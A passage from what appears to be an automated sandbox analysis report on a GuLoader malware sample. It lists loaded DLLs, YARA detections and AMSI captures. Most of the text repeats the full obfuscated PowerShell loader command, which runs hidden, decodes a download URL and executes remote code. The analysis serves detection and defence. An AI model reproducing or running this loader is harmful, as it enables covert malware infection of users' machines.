            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000005.00000002.2257014116.0000000006DE8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000005.00000002.2265640290.000000000DB8A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2264331701.0000000008220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253915133.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trvaren)$global:Ubehjlpsommes = [System.Text.Encoding]::ASCII.GetString($Paddehatteskyernes)$global:Biologernes196=$Ubehjlpsommes.substring($Selvflelsers,$Topfigur)<#Redtab Trommesla
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Florideae $Locoweed $Playboyenes), (Latipennine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:mukkerter = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Adinida)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kurabel, $false).DefineType($Tekstforfatteres, $s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trvaren)$global:Ubehjlpsommes = [System.Text.Encoding]::ASCII.GetString($Paddehatteskyernes)$global:Biologernes196=$Ubehjlpsommes.substring($Selvflelsers,$Topfigur)<#Redtab Trommesla
            Obfuscated command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie 